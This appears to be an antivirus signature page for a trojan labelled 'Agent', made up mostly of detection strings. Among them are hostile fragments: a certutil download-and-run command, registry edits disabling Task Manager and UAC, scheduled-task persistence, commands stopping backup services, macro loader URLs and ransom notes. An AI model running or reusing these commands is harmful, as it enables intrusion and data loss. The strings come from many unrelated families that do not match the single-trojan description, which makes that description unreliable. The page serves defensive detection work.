Concrete signature match: Trojan - Appears legitimate but performs malicious actions for Linux platform, family Agent
This is a Windows trojan agent, likely misclassified as a Linux threat, that establishes persistence through malicious services and registry modifications. It masquerades as legitimate system processes while communicating with a command-and-control server (upcfg.j7y.net) to download and execute additional malware.
Relevant strings associated with this threat:
- FBI Online Agent v (PEHSTR_EXT)
- \CurrentVersion\Run (PEHSTR_EXT)
- \flashplayer\sys\#local\ (PEHSTR_EXT)
- ://local/123.swf (PEHSTR_EXT)
- FBI Online Agent v.2. (PEHSTR_EXT)
- After paying the fine your computer will be unlocked (PEHSTR_EXT)
- Cleaver.Net (PEHSTR_EXT)
- KillThisAgent (PEHSTR_EXT)
- ProcessUpdateCommands (PEHSTR_EXT)
- getAgent (PEHSTR_EXT)
- /?8080 (PEHSTR_EXT)
- /?80&file=SenderClient.conf (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 (PEHSTR_EXT)
- .in.ua (PEHSTR_EXT)
- mail.ru (PEHSTR_EXT)
- Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0) (PEHSTR_EXT)
- /index.php?record= (PEHSTR_EXT)
- HTTP/1.1 (PEHSTR_EXT)
- User-Agent: Opera/9.80 (Windows NT 6.1; U; ru) Presto/ (PEHSTR_EXT)
- SOFTWARE\GigaClicks Crawler (PEHSTR_EXT)
- User-Agent: NSISDL/1.2 (Mozilla) (PEHSTR_EXT)
- http://cdn.gigaclicks.net/file.php?supp=130 (PEHSTR_EXT)
- http://cdn.gigaclicks.net/file.php?supp=126 (PEHSTR_EXT)
- media.bulkweb.org/search.thn (PEHSTR_EXT)
- speak.checknik.com/view.thn (PEHSTR_EXT)
- GET {PATH} HTTP/1.1 (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows; (PEHSTR_EXT)
- User-Agent: Apple TV 5.0 (PEHSTR_EXT)
- ^S\P^Z (MACRO_SOURCE)
- Z'Y`/ (MACRO_SOURCE)
- 80.242.123.155/" (MACROHSTR_EXT)
- exe/ (MACROHSTR_EXT)
- http://46.30.43.146/909.jpg (MACROHSTR_EXT)
- 034f43+buhu5.ru/ (MACROHSTR_EXT)
- http://thewelltakeberlin.com/92.exe (MACROHSTR_EXT)
- nzzv://suxkroqkyzujge.ius/ulloik.kdk (MACROHSTR_EXT)
- + "46.30.41" + ".150/" + "bb.ty" + "p" (MACROHSTR_EXT)
- Shell (qau.aoi.Text & wpvmbiudhmceufab) (MACROHSTR_EXT)
- https://ads-letter.info/client_script.js (MACROHSTR_EXT)
- twm1qP5X34eq.Open "poST", bt9tzD.J3jEet1U5 (MACROHSTR_EXT)
- yos/mtcpp.i.tiwcdtow/nhew1ieg/.mm//2x/m:va (MACROHSTR_EXT)
- beesteriphudilulunpecharakkees\pm.j\\:sptth (MACROHSTR_EXT)
- Call VBA.Shell( (MACROHSTR_EXT)
- "dolphin2000.ir/tmp/" (MACROHSTR_EXT)
- "gnf.jotpee.de/tmp/" (MACROHSTR_EXT)
- .Open "GET", (MACROHSTR_EXT)
- http://darkbreak.webcindario.com/update/myapp.zip (MACROHSTR_EXT)
- StrReverse("e.tsohnvs\pmeT\lacoL\%ATADPPA%") & "xe (MACROHSTR_EXT)
- designers/img/sunny30.html (PEHSTR_EXT)
- events/get_temp.php (PEHSTR_EXT)
- mixedwork.com (PEHSTR_EXT)
- events/add_temp.php (PEHSTR_EXT)
- ldsfdsfdsfZXXwelcome (PEHSTR_EXT)
- stdio/pic/1.html (PEHSTR_EXT)
- do/get_temp.php (PEHSTR_EXT)
- pstcmedia.com (PEHSTR_EXT)
- do/add_temp.php (PEHSTR_EXT)
- User-Agent: Skype (PEHSTR_EXT)
- http:// (PEHSTR_EXT)
- /Remote.txt (PEHSTR_EXT)
- \drivers\etc\hosts (PEHSTR_EXT)
- src="%url%"></iframe> (PEHSTR_EXT)
- PolicyAgent (PEHSTR_EXT)
- ws2_32.dll\hookdf (PEHSTR_EXT)
- %s\cmd /c rd "%s" /S /Q (PEHSTR_EXT)
- %sWinNT%d.%d] (PEHSTR_EXT)
- User-Agent: SJZJ (compatible; MSIE 6.0; Win32) (PEHSTR_EXT)
- SteamStealer. (PEHSTR_EXT)
- set_UserAgent (PEHSTR_EXT)
- \SslMM (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7 (PEHSTR_EXT)
- POST http://%ws:%d/%d%s%dHTTP/1.1 (PEHSTR_EXT)
- /launch_reb.php?p=sevenzip (PEHSTR_EXT)
- \setup.exe (PEHSTR_EXT)
- \js (PEHSTR_EXT)
- eAgenturNET (PEHSTR_EXT)
- MAgent (PEHSTR_EXT)
- User-Agent: wget (PEHSTR)
- GET%sHTTP/1.1 (PEHSTR)
- 0.\Bot\Global.cpp (PEHSTR)
- [%s:%03d] Set Fake IE Agent Tag (PEHSTR)
- index.php|uid|v|pi|if| (PEHSTR)
- userAgentFake (PEHSTR_EXT)
- User-Agent: ace4956e-736e-11e6-9584-d7165ca591df (PEHSTR_EXT)
- GET /pixelid2/s2s.php? (PEHSTR_EXT)
- mtdll.dll (PEHSTR_EXT)
- Agent: ace4956e-736e-11e6-9584-d7165ca591df (PEHSTR_EXT)
- = "User-Agent" (MACROHSTR_EXT)
- , ".", CStr( (MACROHSTR_EXT)
- ) + ".") (MACROHSTR_EXT)
- SubProperty.Type = 1 (MACROHSTR_EXT)
- .ComboBox1.ControlTipText (MACROHSTR_EXT)
- .Label1.Caption (MACROHSTR_EXT)
- .com.br/ (MACROHSTR_EXT)
- .Caption) (MACROHSTR_EXT)
- 'sc config SQLSERVERAGENT start= auto' (PEHSTR_EXT)
- //%s:8888/ups.rar (PEHSTR_EXT)
- //%s:8888/wpd.dat (PEHSTR_EXT)
- //%s:8888/wpdmd5.txt (PEHSTR_EXT)
- //down2.b5w91.com:8443 (PEHSTR_EXT)
- /shell?%s (PEHSTR_EXT)
- ;exec sp_add_jobserver (PEHSTR_EXT)
- ;EXEC sp_droplogin (PEHSTR_EXT)
- ;exec(@a); (PEHSTR_EXT)
- <sip:carol@chicago.com> (PEHSTR_EXT)
- @name='bat.exe',@freq_type=4,@active_start_date (PEHSTR_EXT)
- @shell INT EXEC SP_ (PEHSTR_EXT)
- [Cracker:MSSQL] Host:%s, blindExec CMD: %s (PEHSTR_EXT)
- [ExecCode] (PEHSTR_EXT)
- [ExecCode]AUTHORIZATION [dbo] FROM 0x4D5A (PEHSTR_EXT)
- [ServerAgent] (PEHSTR_EXT)
- \Run','rundll32'; (PEHSTR_EXT)
- C:\Progra~1\kugou2010&attrib (PEHSTR_EXT)
- C:\Progra~1\mainsoft&attrib (PEHSTR_EXT)
- C:\Progra~1\shengda&attrib (PEHSTR_EXT)
- cloudyservs.com (PEHSTR_EXT)
- User-Agent: Cloudy (PEHSTR_EXT)
- Global\{JQZXC-52964-GTHJ-QKIU-56POUYT} (PEHSTR_EXT)
- \Release\Cloudy.pdb (PEHSTR_EXT)
- $1.1/ (PEHSTR_EXT)
- \CCleaner\CCleaner.exe (ASEP_FILEPATH)
- (x86)\CCleaner\CCleaner.exe (ASEP_FILEPATH)
- \CCleaner Cloud\CCleanerCloudAgent.exe (ASEP_FILEPATH)
- (x86)\CCleaner Cloud\CCleanerCloudAgent.exe (ASEP_FILEPATH)
- safebank.korea.co.kr (PEHSTR_EXT)
- To restore the files, wrote to the email:bomboms123@mail.ru (PEHSTR_EXT)
- if you do not receive a response from this mail within 24 hours then write to the subsidiary:yourfood20@mail.ru (PEHSTR_EXT)
- 5.8.88.237 (PEHSTR_EXT)
- User-Agent: GIBON (PEHSTR_EXT)
- jmqapf3nflatei35.onion.link (PEHSTR_EXT)
- 19204ur2907ut982gi3hoje9sfa.exe (PEHSTR_EXT)
- You have not paid the ransom. (PEHSTR_EXT)
- Congrats: you've paid. Click OK to decrypt your files (This will take a while so be patient). (PEHSTR_EXT)
- MoneroPayAgent.exe (PEHSTR_EXT)
- REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /F /t REG_SZ /V "MoneroPay" /D (PEHSTR_EXT)
- \\.\pipe\pidplacesomepipe (PEHSTR_EXT)
- \Release\GetSystemInfo.pdb (PEHSTR_EXT)
- <autostart>no</autostart> (PEHSTR_EXT)
- <autostart>yes</autostart> (PEHSTR_EXT)
- GB</ram> (PEHSTR_EXT)
- </general> (PEHSTR_EXT)
- <needinfo name="id"/> (PEHSTR_EXT)
- <needinfo name="ip"/> (PEHSTR_EXT)
- <conf ctl="dinj" file="dinj" period="20"/> (PEHSTR_EXT)
- <conf ctl="sinj" file="sinj" period="20"/> (PEHSTR_EXT)
- <conf ctl="dpost" file="dpost" period="60"/> (PEHSTR_EXT)
- <conf ctl="SetConf" file="mailconf" period="90"/> (PEHSTR_EXT)
- injectDll (PEHSTR_EXT)
- /ser0417/ (PEHSTR_EXT)
- /5/sinj/ (PEHSTR_EXT)
- /injectDll/VERS/browser/ (PEHSTR_EXT)
- %s/%s/%s/send/ (PEHSTR_EXT)
- User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0 (PEHSTR_EXT)
- Content-Type: multipart/form-data; boundary=------Boundary0027 (PEHSTR_EXT)
- _configs\dinj (PEHSTR_EXT)
- \runlog* (PEHSTR_EXT)
- -c SampleDomain.com -m scheduleminutes (PEHSTR_EXT)
- .msoffice365update.com (PEHSTR_EXT)
- cmd /c schtasks /query /tn TimeUpdate > NUL 2>&1 || schtasks /create /sc minute /mo 0003 /tn TimeUpdate /tr (PEHSTR_EXT)
- cmd /c schtasks /query /tn TimeUpdate > NUL 2>&1 || schtasks /create /sc minute /mo (PEHSTR_EXT)
- /tn TimeUpdate /tr "\" (PEHSTR_EXT)
- www. (PEHSTR_EXT)
- out.exe (PEHSTR_EXT)
- can not specify comp name!! (PEHSTR_EXT)
- action2/ (PEHSTR_EXT)
- C:\windows\system32\cmd.exe /c ( (PEHSTR_EXT)
- upload/ (PEHSTR_EXT)
- Content-Disposition: form-data; name="file"; filename="a.a" (PEHSTR_EXT)
- \runlog (PEHSTR_EXT)
- .tmp" (PEHSTR_EXT)
- response/ (PEHSTR_EXT)
- C:\Users\Ross\Documents\Visual Studio 2015\Projects\Win32Project1\Release\Win32Project1.pdb (PEHSTR_EXT)
- f:\Users\Naughty Develop\Desktop\New Backdoor2.5-with-cmd-resource\New Backdoor2.3\Release\Backdoor.pdb (PEHSTR)
- K:\FirstBackDoor(2015_1_10)\FirstBackDoor(2015_1_10)\Release\FirstUrlMon.pdb (PEHSTR)
- L:\PH2015_2.2\New Backdoor2.2\New Backdoor2.2\Release\CppUACSelfElevation.pdb (PEHSTR)
- ):\work\4th\plugin\OffSM\Release\OffSM.pdb (PEHSTR)
- #:\work\4th\plugin\SM\Release\SM.pdb (PEHSTR)
- #:\work\n1st\Agent\Release\HncUp.pdb (PEHSTR)
- -:\work\n1st\Agent\Release\PotPlayerUpdate.pdb (PEHSTR)
- installutil /logtoconsole=false /logfile= /u " & Chrw(34) & "% (PEHSTR_EXT)
- CreateObject("WScript.Shell").run strs,0,false (PEHSTR_EXT)
- PermissionViewer.Properties.Resources.resources (PEHSTR_EXT)
- HttpStatusCode (PEHSTR_EXT)
- HttpWebResponse (PEHSTR_EXT)
- Microsoft.VisualBasic.Devices (PEHSTR_EXT)
- ShakeOfTheDay.Resources.resources (PEHSTR_EXT)
- System.Data.SqlClient (PEHSTR_EXT)
- Services.Protocols.SoapHttpClientProtocol (PEHSTR_EXT)
- Users\VICTOR (PEHSTR_EXT)
- fghytutgfnmdfg.My (PEHSTR)
- POOYUGHYFUG.My (PEHSTR)
- ConfuserEx v1.0.0 (PEHSTR)
- /8vlbYwQH2yHM9a3qxYMlIwfucPTFfbqBp2p8vdpNHW2ZUOA (PEHSTR_EXT)
- ConfuserEx v1.0.0 (PEHSTR_EXT)
- http://tlsprotectgo.xyz/EmE6d/Mddoryz_Vbilvvxs.jpg (PEHSTR_EXT)
- SeafkoAgent.IRCClinet (PEHSTR_EXT)
- D:\PB\VSAgent\ (PEHSTR_EXT)
- \s\Client\Source\ClientSource\Release\PBConfig.pdb (PEHSTR_EXT)
- \Debug\IELibrary.pdb (PEHSTR_EXT)
- TiniMetI.exe (PEHSTR)
- PwmSvc.exe (PEHSTR)
- uiSeAgnt.exe (PEHSTR)
- coreServiceShell.exe (PEHSTR)
- PtSessionAgent.exe (PEHSTR)
- %Mgr.RhY4RfE5Qd:f (PEHSTR_EXT)
- extd.exe (PEHSTR_EXT)
- SecureTeam.Attributes.ObfuscatedByAgileDotNetAttribute (PEHSTR_EXT)
- SmartAssembly.Attributes.PoweredByAttribute (PEHSTR_EXT)
- SecureTeam.Attributes.ObfuscatedByCliSecureAttribute (PEHSTR_EXT)
- Xenocode.Client.Attributes.AssemblyAttributes.ProcessedByXenocode (PEHSTR_EXT)
- CryptoObfuscator.ProtectedWithCryptoObfuscatorAttribute (PEHSTR_EXT)
- NineRays.Obfuscator.Evaluation (PEHSTR_EXT)
- System.Security.Cryptography (PEHSTR_EXT)
- System.Runtime.CompilerServices (PEHSTR_EXT)
- DESCryptoServiceProvider (PEHSTR_EXT)
- GetExecutingAssembly (PEHSTR_EXT)
- CompilationRelaxationsAttribute (PEHSTR_EXT)
- CompilerGeneratedAttribute (PEHSTR_EXT)
- log file.exe (PEHSTR)
- C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb (PEHSTR_EXT)
- LoadDotNetPE.dll (PEHSTR_EXT)
- System.Net (PEHSTR_EXT)
- System.Security.Cryptography.AesCryptoServiceProvider (PEHSTR_EXT)
- hOOWd989DTOHFEOtZr.dVHUYZkf5VVcnHC4cP (PEHSTR_EXT)
- @certutil.exe -urlcache -split -f http://down.us-hack.ru/wget.exe (PEHSTR)
- #copy /y wget.exe %windir%\system32\ (PEHSTR)
- taskkill /im svshosb.exe -f (PEHSTR)
- rreg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v '"DisableTaskMgr" /d 1 /t REG_DWORD /f (PEHSTR)
- $wget http://down.us-hack.ru/agwl.exe (PEHSTR)
- "C:\Windows\Tasks\hook\svchosts.exe (PEHSTR)
- :\Windows\Temp\ (PEHSTR_EXT)
- PingCastle.Scanners (PEHSTR_EXT)
- root\cimv2 (PEHSTR_EXT)
- worlorderbillions.top (PEHSTR_EXT)
- .vm_sec (PEHSTR_EXT)
- .themida (PEHSTR_EXT)
- /checkprotection (PEHSTR_EXT)
- \Login Data (PEHSTR_EXT)
- \Default\Login Data (PEHSTR_EXT)
- \mail (PEHSTR_EXT)
- \NETGATE Technologies\BlackHawk (PEHSTR_EXT)
- qemu-ga.exe (PEHSTR)
- iplogger.org (PEHSTR)
- track/glqkhzmp?sub= (PEHSTR)
- \postbackstat.exe (PEHSTR)
- \updater3.exe (PEHSTR)
- dlshsvc.exe (PEHSTR)
- ftshost.exe (PEHSTR)
- mshost.exe (PEHSTR)
- mstray.exe (PEHSTR)
- \\.\mailslot\f2874324320878 (PEHSTR)
- ladd HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0x00000000 /f (PEHSTR)
- $add %s\%s /v %s /t REG_SZ /d "%s" /f (PEHSTR)
- ftsri.php?get&exe (PEHSTR)
- fsi.php?get&exe (PEHSTR)
- allnewsmedia.webatu.com (PEHSTR)
- lovecatalog.comlu.com (PEHSTR)
- yourssagregator.comlu.com (PEHSTR)
- C:\myapp.exe (PEHSTR_EXT)
- \MyApp.log (PEHSTR_EXT)
- //pastebin.com/raw/ (PEHSTR)
- 5) / (MACROHSTR_EXT)
- 5)) / (MACROHSTR_EXT)
- 5 / ( (MACROHSTR_EXT)
- 5 / Int( (MACROHSTR_EXT)
- Software\DownloadManager\Passwords\ (PEHSTR_EXT)
- \Roaming\FlashFXP\3quick.dat (PEHSTR_EXT)
- \Trillian\users\global\accounts.dat (PEHSTR_EXT)
- Software\RimArts\B2\Settings (PEHSTR_EXT)
- \Roaming\Postbox\profiles.ini (PEHSTR_EXT)
- \%insfolder%\%insname% (PEHSTR_EXT)
- 5.189.134.216 (PEHSTR_EXT)
- bdss=Bit Defender,onlinent=QHeal,bdagent=BD Agent,msseces=MS Essentials,fssm32=FSecure,avp=Kaspersky (PEHSTR_EXT)
- Debug\thnaviwa.pdb (PEHSTR_EXT)
- screenCapture (PEHSTR)
- qreg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v disabletaskmgr /t REG_DWORD /d 1 /f (PEHSTR)
- lreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f (PEHSTR)
- }reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f (PEHSTR)
- reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v CheckForUpdates /t REG_SZ /d %homedrive%\COVID-19\Update.vbs /f (PEHSTR)
- yreg.exe ADD HKLM\software\Microsoft\Windows\CurrentVersion\Run /v GoodbyePC! /t REG_SZ /d %homedrive%\COVID-19\end.exe /f (PEHSTR)
- Your Computer Has Been Trashed (PEHSTR)
- cystum.Sucuryty.Sryp (PEHSTR)
- ]source\repos\Windows Update Certifier\Windows Update Certifier\obj\Debug\Update Certifier.pdb (PEHSTR)
- TransactionalFileManager.dll (PEHSTR_EXT)
- plDropnF.exe (PEHSTR)
- Network Adapters.dll (PEHSTR)
- 2\ConfigurationFiles\obj\Debug\Network Adapters.pdb (PEHSTR)
- Microsoft.VisualBasic.ApplicationServices (PEHSTR_EXT)
- Phoenix.Resources.resources (PEHSTR_EXT)
- BBMS.FormCustomerInfo.resources (PEHSTR_EXT)
- BBMS.FormDonorInfo.resources (PEHSTR_EXT)
- BBMS.FormDonorUpdate.resources (PEHSTR_EXT)
- BBMS.FormLogin.resources (PEHSTR_EXT)
- BBMS.FormMain.resources (PEHSTR_EXT)
- BBMS.FormReportViewer.resources (PEHSTR_EXT)
- BBMS.FormStockList.resources (PEHSTR_EXT)
- BBMS.FormUserAccount.resources (PEHSTR_EXT)
- BBMS.Resources.resources (PEHSTR_EXT)
- BBMS.yyt1.resources (PEHSTR_EXT)
- C:\TEMP\haleng.exe (PEHSTR_EXT)
- http://uehge4g6Gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 (PEHSTR_EXT)
- D:\workspace\workspace_c\Gj7eU93o7gGhg_19\Release\Gj7eU93o7gGhg_19.pdb (PEHSTR_EXT)
- jfiag3g_gg.exe (PEHSTR_EXT)
- fj4ghga23_fsa.txt (PEHSTR_EXT)
- Combine (PEHSTR_EXT)
- System.Drawing.Bitmap (PEHSTR)
- $WebBrowserDocumentCompletedEventArgs (PEHSTR)
- DESCryptoServiceProvider (PEHSTR)
- BaiTapThietKeForm.Properties.Resources (PEHSTR_EXT)
- System.Security.Cryptography (PEHSTR)
- C:\Users\xxx\Desktop\IPFAJNYPROGRAM\Client\Client\obj\x86\Release\Client.pdb (PEHSTR_EXT)
- set_UseShellExecute (PEHSTR_EXT)
- ModelsCore.Properties.Resources (PEHSTR_EXT)
- Lerlibro_INC.My.Resources (PEHSTR_EXT)
- bytesToDecompress (PEHSTR_EXT)
- Mini_Game_Center.My (PEHSTR_EXT)
- Mini_Game_Center.snake.resources (PEHSTR_EXT)
- MathDrill_01.My (PEHSTR_EXT)
- CurrentVersion\Explorer\Shell Folders (PEHSTR_EXT)
- \AudioApp (PEHSTR_EXT)
- /C rund (PEHSTR_EXT)
- \Downloads\ (PEHSTR_EXT)
- jazk.dll (PEHSTR_EXT)
- ExecuteNonQuery (PEHSTR_EXT)
- [poldata5].[DeleteExistingReminder] (PEHSTR_EXT)
- poldata5.UpdateSnooze (PEHSTR_EXT)
- /This p (PEHSTR_EXT)
- .tsxt (PEHSTR_EXT)
- .rsrq (PEHSTR_EXT)
- Io.xy (PEHSTR_EXT)
- DatabaseManager.A.resources (PEHSTR_EXT)
- DatabaseManager.FrmMenu.resources (PEHSTR_EXT)
- FolderSearcher.Form1.resources (PEHSTR_EXT)
- System.Text (PEHSTR_EXT)
- AthleticClubManagementSystem.Resources (PEHSTR_EXT)
- RecordBgySystem.My.Resources (PEHSTR_EXT)
- Secure.Messenger.WpfHost (PEHSTR)
- ApartmanOto.pdb (PEHSTR_EXT)
- IHMVB.My (PEHSTR)
- CompareString (PEHSTR_EXT)
- CompareMethod (PEHSTR_EXT)
- BaiTapThietKeForm.frmBai1.resources (PEHSTR_EXT)
- ComputeMatrix (PEHSTR_EXT)
- TVqQAAMAAAAEAAAA//8AALg (PEHSTR_EXT)
- HttpCore.Agent (PEHSTR_EXT)
- https://www.example.com/Default (PEHSTR_EXT)
- \Program (PEHSTR_EXT)
- Espionage_Sorter.My.Resources (PEHSTR_EXT)
- SqlFormatter.Properties.Resources (PEHSTR_EXT)
- MandelbrotExplorer.My.Resources (PEHSTR_EXT)
- File_System_Controls.My.Resources (PEHSTR_EXT)
- SharpDevelop Projects\Tyxif\Tyxif\obj\Debug\Tyxif.pdb (PEHSTR_EXT)
- RangePartition.dll (PEHSTR_EXT)
- Bunifu.UI.Bunifu_Button (PEHSTR_EXT)
- SmartAssembly.Attributes (PEHSTR_EXT)
- System.IO.Compression (PEHSTR_EXT)
- Goriot.Controls (PEHSTR_EXT)
- mscoree.dll (PEHSTR_EXT)
- costura.costura.dll.compressed (PEHSTR_EXT)
- ATMManager.Update.resources (PEHSTR_EXT)
- CompareExchange (PEHSTR)
- *DeltaEngine.Properties.Resources.resources (PEHSTR)
- .Properties.Resources (PEHSTR_EXT)
- ExpenseManager.Properties.Resources (PEHSTR_EXT)
- rozenbayn.Form (PEHSTR_EXT)
- .resources (PEHSTR_EXT)
- projetor.Form (PEHSTR_EXT)
- Form1.resources (PEHSTR_EXT)
- Form2.resources (PEHSTR_EXT)
- Form3.resources (PEHSTR_EXT)
- Tetris.Desktop.GameOver (PEHSTR)
- System.CodeDom.Compiler (PEHSTR_EXT)
- ServiceHub.Host (PEHSTR_EXT)
- 2.4.227.2020 (PEHSTR_EXT)
- 2.4.227+e4076a6e7d.RR (PEHSTR_EXT)
- Blit.exe (PEHSTR)
- WERGHGHJHJF.pdb (PEHSTR_EXT)
- FormSplashScreen (PEHSTR_EXT)
- \Roaming\TReplaceokReplaceenReplaces.tReplacex (PEHSTR_EXT)
- %appdata%\discord\ (PEHSTR_EXT)
- 99.0.4832.0 (PEHSTR_EXT)
- Aspiring_Rookie.Resources.resources (PEHSTR_EXT)
- List_omdre.exe (PEHSTR_EXT)
- Lime_AsyncClientSpoofer.exe (PEHSTR_EXT)
- Lime_AsyncClientSpoofer.Consumers (PEHSTR_EXT)
- bitclient1.exe (PEHSTR_EXT)
- WindowsFormsApp76.Properties (PEHSTR_EXT)
- Lime_async.Definitions (PEHSTR_EXT)
- Lime_async.Specifications (PEHSTR_EXT)
- Lime_Agent (PEHSTR_EXT)
- Lime_Agent.exe (PEHSTR_EXT)
- aaa_TouchMeNot_\aaa_TouchMeNot_.txt (PEHSTR_EXT)
- CONTI_README.txt (PEHSTR_EXT)
- cmd.exe /c net stop VeeamBrokerSvc /y (PEHSTR_EXT)
- cmd.exe /c net stop mfefire /y (PEHSTR_EXT)
- cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y (PEHSTR_EXT)
- cmd.exe /c net stop VeeamEnterpriseManagerSvc (PEHSTR_EXT)
- C:\xampp\htdocs\Cryptor\ (PEHSTR_EXT)
- \Loader\Release\Loader.pdb (PEHSTR_EXT)
- G*.eV (SNID)
- System.ComponentModel (PEHSTR_EXT)
- 24032.3018.0.1 (PEHSTR_EXT)
- CompressionMode (PEHSTR_EXT)
- ByMynix.xyz (PEHSTR_EXT)
- LightWatch.My.Resources (PEHSTR_EXT)
- Forge.Templating.My.Resources (PEHSTR_EXT)
- CompilerProject (PEHSTR_EXT)
- Decompress (PEHSTR_EXT)
- PSQS.Properties.Resources.resources (PEHSTR_EXT)
- 97.0.1.8082 (PEHSTR_EXT)
- hilal.Properties.Resources (PEHSTR_EXT)
- Reload.My.Resources (PEHSTR_EXT)
- Reload.Reload.resources (PEHSTR_EXT)
- file:/// (PEHSTR_EXT)
- Owl.Core.My.Resources (PEHSTR_EXT)
- ASManager2017.My.Resources (PEHSTR_EXT)
- MNJKolK87.pdb (PEHSTR_EXT)
- /tedburke/CommandCam/master/CommandCam.exe (PEHSTR_EXT)
- Trying create screenshot from camera (PEHSTR_EXT)
- /LimerBoy/hackpy/master/modules/audio.zip (PEHSTR_EXT)
- Failed to decrypt file. Wrong password! (PEHSTR_EXT)
- \keylogs (PEHSTR_EXT)
- /master/Stealer/Stealer/modules/Sodium.dll (PEHSTR_EXT)
- /TelegramRAT/core/libs/AudioSwitcher.AudioApi.dll (PEHSTR_EXT)
- LCD.Properties (PEHSTR_EXT)
- 54.65.13.91 (PEHSTR_EXT)
- Application Data\server.txt (PEHSTR_EXT)
- kaskdk.hissssa (MACROHSTR_EXT)
- ko4d = "tp://%748237%728748@j.mp/" (MACROHSTR_EXT)
- tranquvis.Properties.Resources.resources (PEHSTR_EXT)
- .onion (PEHSTR_EXT)
- https://contirecovery.info (PEHSTR_EXT)
- cleaner_.log (PEHSTR_EXT)
- net stop WinREAgent (PEHSTR_EXT)
- net stop RecoveryAgent (PEHSTR_EXT)
- p^i^N^g^.^e^X^E (MACROHSTR_EXT)
- ^h^t^t^p^s^:^/^/^c^a^n^a^d^a^c^i^g^a^r^s^u^p^p^l^i^e^s^.^c^o^m^/^w^p^-^c^o^n^t^e^n^t^/^u^p^l^o^a^d^s^/^2^0^1^8^/^0^5^/^f^i^l^e^s^/^a^n^o^.^e^x^e (MACROHSTR_EXT)
- %TEMP%^\^f^i^l^e^s^.^e^x^e (MACROHSTR_EXT)
- s^t^a^r^t^ ^ ^ %TEMP%^\^f^i^l^e^s^.^e^x^e (MACROHSTR_EXT)
- Application.Wait (Now + TimeValue("0:00:05")) (MACROHSTR_EXT)
- http://asdcqwdwqx.gq/liverpool-fc-news/features/ (PEHSTR_EXT)
- UserAgent: (PEHSTR_EXT)
- Select * from Win32_ComputerSystem (PEHSTR_EXT)
- SbieDll.dll (PEHSTR_EXT)
- CreateObject("WScript.Shell").Run (PEHSTR_EXT)
- Sof#tware\Micr#osoft\Win#dows\Curr#entVer#sion\#R#u#n\ (PEHSTR_EXT)
- AltiumManager.Resources.resources (PEHSTR_EXT)
- AltiumManager.Platinium.resources (PEHSTR_EXT)
- QuanLyDiemSV.Resources.resources (PEHSTR_EXT)
- GraphicsUtility.Form1.resources (PEHSTR_EXT)
- ClumsyProof.My.Resources (PEHSTR_EXT)
- MeteorUiLib.My.Resources (PEHSTR_EXT)
- MainWindow.Resources.resources (PEHSTR_EXT)
- discordapp.com/attachments (PEHSTR_EXT)
- qfa/ti_0ti_ (PEHSTR_EXT)
- LamdaX.My.Resources (PEHSTR_EXT)
- LamdaX.Hyatt.resources (PEHSTR_EXT)
- IExpando.Plug (PEHSTR_EXT)
- Foldz.My.Resources (PEHSTR_EXT)
- MonopolySim.My.Resources (PEHSTR_EXT)
- CheckingAccount.My.Resources (PEHSTR_EXT)
- QLGR_GUI.My.Resources (PEHSTR_EXT)
- Windowssettings.Settings.resources (PEHSTR_EXT)
- BasicClassValidation.My.Resources (PEHSTR_EXT)
- MinesweeperAdvance.My.Resources (PEHSTR_EXT)
- FootballTeams.My.Resources (PEHSTR_EXT)
- MDIWindowManager.My.Resources (PEHSTR_EXT)
- Patch.My.Resources (PEHSTR_EXT)
- test404.My.Resources (PEHSTR_EXT)
- LibraryManagementSystem.My.Resources (PEHSTR_EXT)
- FormEditor.My.Resources (PEHSTR_EXT)
- SoccerStatsForAllProject.My.Resources (PEHSTR_EXT)
- .g.resources (PEHSTR_EXT)
- c:\sri\Message.txt (PEHSTR_EXT)
- PTM.MainForm.resources (PEHSTR_EXT)
- PTM.OPIC.resources (PEHSTR_EXT)
- JoooO.STUB.OoooJ.My.Resources (PEHSTR_EXT)
- UI.My.Resources (PEHSTR_EXT)
- Timeseries.My.Resources (PEHSTR_EXT)
- GoWEditor.My.Resources (PEHSTR_EXT)
- "tp://1230912489%1230192309@j.mp/" (MACROHSTR_EXT)
- "tp://1230948%1230948@j.mp/" (MACROHSTR_EXT)
- "23bbsdajs821" (MACROHSTR_EXT)
- =opera.x+opera.y+textfileforyou.z+textfileforyou.d+hi.openmarket+hi.xxx+hi.k+hi.t (MACROHSTR_EXT)
- textfilestuff.mosuf.tagendfunction (MACROHSTR_EXT)
- PersonnelTracking.Properties.Resources.resources (PEHSTR_EXT)
- LibInUse.My.Resources (PEHSTR_EXT)
- Software.My.Resources (PEHSTR_EXT)
- FileCopier.Properties.Resources (PEHSTR_EXT)
- CriticalAttribute.Resources.resources (PEHSTR_EXT)
- MultiToken.Resources (PEHSTR_EXT)
- q9gcjs5cdzu8afy5yun73g7sbu286um (PEHSTR_EXT)
- BookstoreManagement.GUI.My.Resources (PEHSTR_EXT)
- //transfer.sh (PEHSTR_EXT)
- GET ///RguhsT/accept.php?a= (PEHSTR)
- local.foo.com (PEHSTR)
- AMS.My (PEHSTR_EXT)
- AMS.Add_Course_Teacher_Student.resources (PEHSTR_EXT)
- AMS.AddUserFrm.resources (PEHSTR_EXT)
- AMS.AnsiCharMarshaler.resources (PEHSTR_EXT)
- AMS.Course_Registration.resources (PEHSTR_EXT)
